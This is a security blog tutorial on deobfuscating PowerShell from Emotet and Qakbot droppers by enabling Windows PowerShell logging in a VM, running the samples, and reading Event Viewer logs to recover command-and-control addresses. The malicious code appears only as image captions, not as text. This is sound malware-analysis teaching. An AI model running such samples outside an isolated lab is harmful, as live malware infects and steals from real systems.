{ Security-in-bits }

Deobfuscate PowerShell using PowerShell Logging

Deobfuscation, Emotet, PowerShell, Qakbot
Ayush Anand
About the Newsletter

Join 100+ subscribers who get 0x1 actionable security bit every week.

shieldSubscribe
We will use inbuilt PowerShell Logging in Windows 10 VM to deobfuscate PowerShell code used to deliver Emotet & Qakbot. Malware uses PowerShell mostly to download payload from CC and execute it.

Why do we need to do this?

  • Easy technique to deobfuscate PowerShell without using any external tool
  • Extract CC from PowerShell

Sample

Enable PowerShell Logging

Windows 10 VM doesn’t require any software updates to support enhanced PowerShell logging. But if you still want to configure Windows 7 VM, please check the FireEye article Greater Visibility Through PowerShell Logging.

1. Open Local Group Policy editor and navigate to
Computer Configuration -> Administrative Templates -> Windows Components -> Windows PowerShell

Initial PowerShell Logging Setting
Initial PowerShell Logging Setting

2. Enable the following three options shown below. Enter * in Module Names for Module logging.
PowerShell Group Policy Setting
PowerShell Group Policy Setting

grade

Tip: Enter gpedit.msc in Run to open Local Group policy and eventvwr.msc for Event Viewer

Steps

  1. Open Event Viewer and navigate to Windows Logs -> Application and Service Logs -> Windows PowerShell, right click and clear the existing logs
  2. Execute the malware and wait for some time 30-60 sec.
  3. Open ProcessHacker and check for termination of PowerShell process.
  4. Open EventViewer and navigate to Windows PowerShell log and check the entries, you will see some deobfuscated PowerShell
  5. Analyze PowerShell if needed to extract CC info

Example of Emotet & Qakbot

Qakbot
  1. hta file contain Obfuscated VBScript code
    Initial Obfuscated hta
    Initial Obfuscated hta
    Initial Obfuscated hta file which contain VBScript
  2. Deobfuscate VBScript by replacing ]+($)#!%/=[?-_&*<> with ” and you can see obfuscated PowerShell.
    Initial Obfuscate PowerShell
    Initial Obfuscate PowerShell
    Initial Obfuscate PowerShell
  3. But we don’t need to do above step, we can just run the hta file and see more clearer PowerShell code shown below.
    Qakbot PowerShell Deobfuscation
    Qakbot PowerShell Deobfuscation
    2nd level deobfuscated code is much better as you can see the CC
  4. Extract CC by executing below PowerShell code
    Qakbot CC
    Execute PowerShell Code to extract CC
Emotet
Obfuscated Emotet PoweShell cmd
Obfuscated Emotet PoweShell cmd
Contain PowerShell cmd extracted from Emotet doc
Emotet_Powershell 1st
Emotet Powershell 1st Entry

Emotet Deobfuscated Powershell
Emotet Deobfuscated Powershell
Check the highlighted Deobfuscated Code

Thanks for reading. Feel free to connect with me on or LinkedIn for any suggestions or comments.

For more updates and exclusive content, subscribe to our newsletter. Happy Reversing! 😊

Join 100+ subscribers who get 0x1 actionable security bit every week.




4 Comments. Leave new

Leave a Reply

Your email address will not be published. Required fields are marked *

Fill out this field
Fill out this field
Please enter a valid email address.

Related Posts

keyboard_arrow_up
This website uses cookies to improve your experience. If you continue to use this site, you agree with it.